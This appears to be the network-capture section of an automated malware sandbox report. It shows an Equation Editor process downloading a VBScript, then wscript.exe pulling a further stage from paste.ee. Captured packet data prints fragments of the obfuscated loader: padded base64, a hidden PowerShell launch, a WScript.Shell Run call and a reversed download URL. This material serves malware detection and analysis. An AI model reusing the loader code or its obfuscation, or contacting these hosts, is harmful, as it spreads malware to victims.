                                                                                            Dec 4, 2024 12:21:05.325582027 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.325589895 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.333645105 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.333729029 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.333741903 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.335149050 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.341895103 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.341908932 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.341989040 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.346148968 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.346168041 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.346227884 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.353718996 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.353730917 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.353840113 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.361268044 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.361279964 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.361490011 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.365511894 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.365531921 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.365606070 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.373718023 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.373817921 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.381860018 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.381949902 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.386065006 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.386149883 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.477051973 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.477166891 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.480344057 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.480426073 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.486619949 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.486704111 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.492872000 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.492959023 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.495893002 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.495974064 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.501626015 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.501717091 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.507150888 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.507246971 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.507273912 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.507294893 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.507375956 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.507446051 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.507462025 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.507493019 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.507498980 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:08.624984026 CET49166443192.168.2.22142.215.209.78
                                                                                            Dec 4, 2024 12:21:08.625049114 CET44349166142.215.209.78192.168.2.22
                                                                                            Dec 4, 2024 12:21:08.625128031 CET49166443192.168.2.22142.215.209.78
                                                                                            Dec 4, 2024 12:21:08.681466103 CET49166443192.168.2.22142.215.209.78
                                                                                            Dec 4, 2024 12:21:08.681494951 CET44349166142.215.209.78192.168.2.22
                                                                                            Dec 4, 2024 12:21:10.217416048 CET44349166142.215.209.78192.168.2.22
                                                                                            Dec 4, 2024 12:21:10.217571974 CET49166443192.168.2.22142.215.209.78
                                                                                            Dec 4, 2024 12:21:10.222291946 CET49166443192.168.2.22142.215.209.78
                                                                                            Dec 4, 2024 12:21:10.222306013 CET44349166142.215.209.78192.168.2.22
                                                                                            Dec 4, 2024 12:21:10.222615957 CET44349166142.215.209.78192.168.2.22
                                                                                            Dec 4, 2024 12:21:10.284986973 CET49166443192.168.2.22142.215.209.78
                                                                                            Dec 4, 2024 12:21:10.327342987 CET44349166142.215.209.78192.168.2.22
                                                                                            Dec 4, 2024 12:21:10.606503010 CET44349166142.215.209.78192.168.2.22
                                                                                            Dec 4, 2024 12:21:10.606762886 CET44349166142.215.209.78192.168.2.22
                                                                                            Dec 4, 2024 12:21:10.606843948 CET49166443192.168.2.22142.215.209.78
                                                                                            Dec 4, 2024 12:21:10.616446018 CET49166443192.168.2.22142.215.209.78

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 4, 2024 12:21:00.908365965 CET5456253192.168.2.228.8.8.8
                                                                                            Dec 4, 2024 12:21:01.150835991 CET53545628.8.8.8192.168.2.22
                                                                                            Dec 4, 2024 12:21:01.151190042 CET5456253192.168.2.228.8.8.8
                                                                                            Dec 4, 2024 12:21:01.274321079 CET53545628.8.8.8192.168.2.22
                                                                                            Dec 4, 2024 12:21:01.291336060 CET5291753192.168.2.228.8.8.8
                                                                                            Dec 4, 2024 12:21:01.531986952 CET53529178.8.8.8192.168.2.22
                                                                                            Dec 4, 2024 12:21:08.063664913 CET6275153192.168.2.228.8.8.8
                                                                                            Dec 4, 2024 12:21:08.325062990 CET53627518.8.8.8192.168.2.22
                                                                                            Dec 4, 2024 12:21:08.328504086 CET5789353192.168.2.228.8.8.8
                                                                                            Dec 4, 2024 12:21:08.588848114 CET53578938.8.8.8192.168.2.22

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 4, 2024 12:21:00.908365965 CET192.168.2.228.8.8.80x9b18Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:01.151190042 CET192.168.2.228.8.8.80x9b18Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:01.291336060 CET192.168.2.228.8.8.80xe0e1Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:08.063664913 CET192.168.2.228.8.8.80xc3c4Standard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:08.328504086 CET192.168.2.228.8.8.80x5f5dStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 4, 2024 12:21:01.150835991 CET8.8.8.8192.168.2.220x9b18No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:01.150835991 CET8.8.8.8192.168.2.220x9b18No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:01.274321079 CET8.8.8.8192.168.2.220x9b18No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:01.274321079 CET8.8.8.8192.168.2.220x9b18No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:01.531986952 CET8.8.8.8192.168.2.220xe0e1No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:01.531986952 CET8.8.8.8192.168.2.220xe0e1No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:08.325062990 CET8.8.8.8192.168.2.220xc3c4No error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:08.325062990 CET8.8.8.8192.168.2.220xc3c4No error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:08.588848114 CET8.8.8.8192.168.2.220x5f5dNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 4, 2024 12:21:08.588848114 CET8.8.8.8192.168.2.220x5f5dNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • paste.ee
                                                                                            • 1017.filemail.com
                                                                                            • 104.168.7.19

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.2249163104.168.7.19803444C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 4, 2024 12:20:59.429972887 CET327OUTGET /webmadamMPDW-constraints.vbs HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 104.168.7.19
                                                                                            Connection: Keep-Alive
                                                                                            Dec 4, 2024 12:21:00.548499107 CET1236INHTTP/1.1 200 OK
                                                                                            Content-Type: text/vbscript
                                                                                            Content-Encoding: gzip
                                                                                            Last-Modified: Wed, 20 Nov 2024 13:11:26 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "0533db44d3bdb1:0"
                                                                                            Vary: Accept-Encoding
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Wed, 04 Dec 2024 11:21:00 GMT
                                                                                            Content-Length: 1965
                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec 5a 6b 6f 1b 45 17 9e cf af c4 7f b0 fc 01 1c d4 6e 2e 55 11 8a 00 11 d2 cb 5b 48 d3 52 87 b6 08 21 64 c7 eb da ad 6f f5 da 49 da 1f 0f 3c e7 9c 19 7b 76 67 66 af 09 34 12 5a ad ed dd 99 39 f7 eb 8c ff fa f3 33 f5 3f 45 f7 23 b5 56 33 75 ae 56 6a ac e6 f8 d5 52 43 d5 53 13 dc e7 2a 56 1d b5 50 4b 8c cc 30 7e 86 ef 73 f5 0e 6f 57 ea 0e e6 25 78 a2 b1 05 9e 8f 79 ed 0a 63 57 7a 74 bb ee 18 b0 16 b8 fb 78 9e e0 26 4c 31 56 ef 30 fe 96 be 1e e0 ed 14 df 03 1e 23 fc 09 ae b9 c6 34 c7 9b 01 de 0d 40 ed 12 df f6 ca 2e 53 e4 ae 6c a9 6f 4b d1 11 a9 d7 c0 3c 51 a7 58 43 30 7c b0 5d 0a 04 7a 16 67 84 cf 18 cf 31 4b b4 cb 98 df f0 b3 81 de 51 6d 50 91 40 ca 87 ea 79 21 6d 6d 2d 25 9b a6 27 58 db 62 78 21 ca 9e e0 ad 99 31 d2 34 b4 a0 bf 11 60 ce 52 b0 b2 d2 ef a9 b7 6c 0f 2b 86 d7 c3 bb 58 eb 95 f4 40 fa 26 aa 16 98 bd e4 37 6f 19 e7 1a f3 e8 a6 37 2b a6 61 a6 de e3 0d f1 21 1a ec 31 8c 84 e1 1a 98 73 2f 25 46 e2 61 4a 44 f2 61 eb 8b d4 cf 58 19 f3 4d 12 9e 63 4e 8c ef ad be 1f [TRUNCATED]
                                                                                            Data Ascii: ZkoEn.U[HR!doI<{vgf4Z93?E#V3uVjRCS*VPK0~soW%xycWztx&L1V0#4@.SloK<QXC0|]zg1KQmP@y!mm-%'Xbx!14`Rl+X@&7o7+a!1s/%FaJDaXMcN3$]9fGV?0~*1eIRW65m5Bk4}Rh_Xj%G/EMf4l[r1SH}19W/#$#ib}2;vy.$[Plt?]{)8?BUWY0@1A%f=dxyfpY"1{\"x/nVv[8Wgj|ddXKQ5Lq.CV+fN\)'2&]Ch^C"@b#1iJGG&^DsN]im$'9ktGuR`HGVXL\sCPblZJY^wU_>Na*_ZRaKs6Cm{[f&9L+W$t=$]F%s_,ZkZj>~><Cj3c"cC
                                                                                            Dec 4, 2024 12:21:00.548574924 CET1005INData Raw: 92 4d 3d c3 f8 5b ed 23 e4 0f 4f b1 56 ba ca 03 48 b2 cb 56 77 c1 9f f2 f6 ff b0 9f 33 58 66 a4 be c2 bd b7 f1 90 34 3d 82 a7 ad 5e 81 cf 2e 78 fc 49 fd 82 f5 27 ea 07 ac 7d 09 be 4e d5 af ea 47 8c d3 4a 43 b7 59 33 2a 58 b5 6a 38 be 28 18 3f 2c
                                                                                            Data Ascii: M=[#OVHVw3Xf4=^.xI'}NGJCY3*Xj8(?,m8^W04?.gpSmdtdgl,gx5=BBgd'C2%"P:zNtV1<jD+1k9F<+AfQC|~pq|;zC7


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.2249164188.114.97.6803588C:\Windows\SysWOW64\wscript.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 4, 2024 12:21:01.688338995 CET173OUTGET /d/OARvm HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            Accept-Language: en-us
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: paste.ee
                                                                                            Dec 4, 2024 12:21:02.969011068 CET994INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Wed, 04 Dec 2024 11:21:02 GMT
                                                                                            Content-Type: text/html
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Location: https://paste.ee/d/OARvm
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9jpYjOkJ8n3o1KEZmAfhiJoTnE5ddQGmRKba0qXRSbFFBslSoOJUc4eMHNXcChwLoZD3dFnXBpw7Paz7iKx0oD29noonomsiGPx9WCHFxttqEq0B9Mg4JElBxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8ecb691f9e53428e-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1709&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.2249165188.114.97.64433588C:\Windows\SysWOW64\wscript.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-04 11:21:04 UTC173OUTGET /d/OARvm HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            Accept-Language: en-us
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: paste.ee
                                                                                            2024-12-04 11:21:04 UTC1232INHTTP/1.1 200 OK
                                                                                            Date: Wed, 04 Dec 2024 11:21:04 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Cache-Control: max-age=2592000
                                                                                            strict-transport-security: max-age=63072000
                                                                                            x-frame-options: DENY
                                                                                            x-content-type-options: nosniff
                                                                                            x-xss-protection: 1; mode=block
                                                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bo5QO7arBhyAQ04%2B2lLQnkeI4eTBrnBFfj99w85NyYVtWgYb8wlgIz53k%2FUMPuR5vlP%2FGVkTnJTwp1Hy8ac6XSHRXijjqUMGEd1l38T9fubBUREBLBCuxsplmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8ecb692af9a58c89-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            2024-12-04 11:21:04 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 30 35 32 26 6d 69 6e 5f 72 74 74 3d 32 30 31 39 26 72 74 74 5f 76 61 72 3d 37 38 31 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 34 36 32 36 30 26 63 77 6e 64 3d 32 30 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 32 39 37 66 37 35 34 33 63 34 64 62 38 30 66 26 74 73 3d 37 31 31 26 78 3d 30 22 0d 0a 0d 0a
                                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2019&rtt_var=781&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=787&delivery_rate=1446260&cwnd=202&unsent_bytes=0&cid=4297f7543c4db80f&ts=711&x=0"
                                                                                            2024-12-04 11:21:04 UTC1291INData Raw: 31 66 37 66 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 52 65 70 6c 61 63 65 53 74 72 69 6e 67 28 42 79 56 61 6c 20 74 65 78 74 6f 2c 20 42 79 56 61 6c 20 70 72 6f 63 75 72 61 2c 20 42 79 56 61 6c 20 73 75 62 73 74 69 74 75 69 29 0d 0a 20 20 20 20 44 69 6d 20 70 6f 73 69 63 61 6f 0d 0a 20 20 20 20 70 6f 73 69 63 61 6f 20 3d 20 49 6e 53 74 72 28 74 65 78 74 6f 2c 20 70 72 6f 63 75 72 61 29 0d 0a 20 20 20 20 0d 0a 20 20 20 20 44 6f 20 57 68 69 6c 65 20 70 6f 73 69 63 61 6f 20 3e 20 30 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 6f 20 3d 20 4c 65 66 74 28 74 65 78 74 6f 2c 20 70 6f 73 69 63 61 6f 20 2d 20 31 29 20 26 20 73 75 62 73 74 69 74 75 69 20 26 20 4d 69 64 28 74 65 78 74 6f 2c 20 70 6f 73 69 63 61 6f 20 2b 20 4c 65 6e 28 70 72 6f 63 75 72 61 29 29 0d
                                                                                            Data Ascii: 1f7fFunction ReplaceString(ByVal texto, ByVal procura, ByVal substitui) Dim posicao posicao = InStr(texto, procura) Do While posicao > 0 texto = Left(texto, posicao - 1) & substitui & Mid(texto, posicao + Len(procura))
                                                                                            2024-12-04 11:21:04 UTC1369INData Raw: 4a 70 62 6d 63 6f 65 6c 6c 32 61 57 22 0d 0a 20 20 20 20 20 20 20 20 76 6e 71 68 76 20 3d 20 76 6e 71 68 76 20 26 20 22 31 68 5a 32 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 56 43 65 58 52 6c 63 79 6b 37 65 6c 6c 32 63 33 52 68 63 6e 52 47 62 47 46 6e 49 44 30 67 64 6d 5a 6a 50 44 78 43 51 56 4e 46 4e 6a 52 66 55 31 52 42 55 6c 51 6e 4b 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 79 63 2b 4a 79 73 6e 50 6e 5a 6d 59 7a 73 6e 4b 79 64 36 57 58 5a 6c 62 6d 52 47 62 47 46 6e 49 44 30 67 64 6d 5a 6a 50 44 78 43 51 56 4e 46 4e 6a 52 66 52 55 35 45 50 6a 35 32 5a 6d 4d 37 65 6c 6c 32 63 33 52 68 63 6e 52 4a 62 6d 52 6c 65 43 41 39 49 48 70 5a 64 6d 6c 74 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 59 57 64 6c 56 47 56 34 64 43 35 4a 62 6d 52 6c 65 45 39 6d
                                                                                            Data Ascii: Jpbmcoell2aW" vnqhv = vnqhv & "1hZ2WISEKUXLBTVDNYJVCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKWISEKUXLBTVDNYJyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltWISEKUXLBTVDNYJYWdlVGV4dC5JbmRleE9m
                                                                                            2024-12-04 11:21:04 UTC1369INData Raw: 6c 69 4c 6b 6c 50 4c 6b 68 76 62 57 56 64 4c 6b 64 6c 64 45 31 6c 64 47 68 76 5a 43 68 32 5a 6d 4e 57 51 55 6c 32 5a 6d 4d 70 4f 33 70 5a 64 6e 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 5a 68 61 55 31 6c 64 47 68 76 5a 43 35 4a 62 6e 5a 76 61 32 22 0d 0a 20 20 20 20 20 20 20 20 76 6e 71 68 76 20 3d 20 76 6e 71 68 76 20 26 20 22 55 6f 65 6c 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 6c 32 62 6e 56 73 62 43 77 67 51 43 68 32 5a 6d 4e 30 65 48 51 75 4e 44 55 30 4e 44 59 31 4e 6a 55 30 4d 32 31 74 59 57 52 68 62 57 4a 6c 64 32 46 68 59 57 46 68 59 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 57 46 68 59 58 4e 75 62 32 59 76 4f 54 45 75 4e 79 34 34 4e 6a 45 75 4e 44 41 78 4c 79 38 36 63 48 52 30 61 48 5a 6d 59 79 77 67 64 6d 5a 6a 5a 47 56 7a 59 58 52 70
                                                                                            Data Ascii: liLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnWISEKUXLBTVDNYJZhaU1ldGhvZC5JbnZva2" vnqhv = vnqhv & "UoelWISEKUXLBTVDNYJl2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWISEKUXLBTVDNYJWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRp
                                                                                            2024-12-04 11:21:04 UTC1369INData Raw: 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 3d 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 20 5b 73 79 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 73 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 74 65 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 6d 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 2e 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 54 65 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 78 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 74 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 22 0d 0a 20 20 20 20 20 20
                                                                                            Data Ascii: " JJbnw = JJbnw & "=WISEKUXLBTVDNYJ [syWISEKUXLBTVDNYJs" JJbnw = JJbnw & "WISEKUXLBTVDNYJteWISEKUXLBTVDNYJm" JJbnw = JJbnw & ".WISEKUXLBTVDNYJTeWISEKUXLBTVDNYJ" JJbnw = JJbnw & "xWISEKUXLBTVDNYJtWISEKUXLBTVDNYJ"
                                                                                            2024-12-04 11:21:04 UTC1369INData Raw: 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 65 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 78 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 65 20 2d 77 69 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 6e 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 64 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 6f 77 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 73 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 74 79 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 6c 65 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 20 68 69 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 64 64 57 49 53 45 4b 55 58 4c 42 54 56 44 4e 59 4a 65 6e 20 2d
                                                                                            Data Ascii: SEKUXLBTVDNYJe" JJbnw = JJbnw & "xWISEKUXLBTVDNYJe -wiWISEKUXLBTVDNYJn" JJbnw = JJbnw & "dWISEKUXLBTVDNYJowWISEKUXLBTVDNYJs" JJbnw = JJbnw & "tyWISEKUXLBTVDNYJleWISEKUXLBTVDNYJ hi" JJbnw = JJbnw & "ddWISEKUXLBTVDNYJen -
                                                                                            2024-12-04 11:21:04 UTC1304INData Raw: 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 20 20 20 20 20 20 20 20 73 68 65 6c 6c 6c 2e 52 75 6e 20 63 68 61 6d 62 72 61 6e 61 2c 20 30 2c 20 46 61 6c 73 65 20 0d 0a 20 20 20 20 20 20 20 20 57 53 63 72 69 70 74 2e 51 75 69 74 28 45 52 52 5f 47 45 4e 45 52 41 4c 5f 46 41 49 4c 55 52 45 29 0d 0a 45 6e 64 20 49 66 0d 0a 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 20 20 20 20 0d 0a 27 20 45 73 63 61 70 65 73 20 6e 6f 6e 20 58 4d 4c 20 63 68 61 72 73 0d 0a 0d 0a 0d 0a 0d 0a 70 72 69 76 61 74 65 20 66 75 6e 63 74 69 6f 6e 20 45 73 63 61 70 65 28 73 74 72 29 0d 0a 20 20 20 20 64 69 6d 20 69 20 0d 0a 20 20 20 20 66 6f 72 20 69 20 3d 20 31 20 74 6f 20 4c 65 6e 28 73 74 72 29 0d 0a 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 20 63 61
                                                                                            Data Ascii: t("WScript.Shell") shelll.Run chambrana, 0, False WScript.Quit(ERR_GENERAL_FAILURE)End If'''''''''''''''''''' ' Escapes non XML charsprivate function Escape(str) dim i for i = 1 to Len(str) select ca
